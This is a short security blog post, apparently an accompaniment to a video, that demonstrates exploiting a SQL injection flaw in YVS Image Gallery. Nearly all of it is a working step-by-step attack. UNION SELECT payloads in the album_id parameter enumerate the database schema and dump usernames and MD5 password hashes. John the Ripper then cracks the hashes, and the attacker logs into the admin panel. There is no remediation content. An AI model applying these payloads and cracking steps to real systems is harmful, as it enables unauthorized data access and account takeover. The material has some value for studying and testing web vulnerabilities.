rss
twitter
  •  
Fashion wordpress theme

[VIDEO] YVS Image Gallery – SQL Injection

Posted by Infosec Shinobi | Posted in Security Videos | Posted on 01-03-2012

14

Download video: http://www.mediafire.com/?mbf1l0ql1514dq3

Brief Overview

 YVS Image Gallery is a small database driven gallery created to be implemented within your existing site. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails.
As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL Injection. So basically what I did was to exploit this vulnerability.

 Tools

Commands

//Open on firefox
http://127.0.0.1/server_path/view_all_albums.php
//Check the column count
http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--
http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--

//Get the version, current user and the database name
http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--

//Get all the tables in the database
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--
//Get all the column names
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--
//Get username & password from the table "user"
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--
//The password is md5 encrypted, so we have to decrypt it
//We save the username:hash in a file and name it "pwd.txt"
//We open up a terminal on our backtrack
//We need to Brute Force the user credentials for the web application using John The Ripper
cd pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the ripper then cracks the hash and gives us the password
//After which we then login to the YVS Image Gallery admin panel

 #####                          #######
#     #   ##   #    # ######    #     # #    # ###### #####
#        #  #  ##  ## #         #     # #    # #      #    #
#  #### #    # # ## # #####     #     # #    # #####  #    #
#     # ###### #    # #         #     # #    # #      #####
#     # #    # #    # #         #     #  #  #  #      #   #
 #####  #    # #    # ######    #######   ##   ###### #    #

@InfosecShinobi

Continue Reading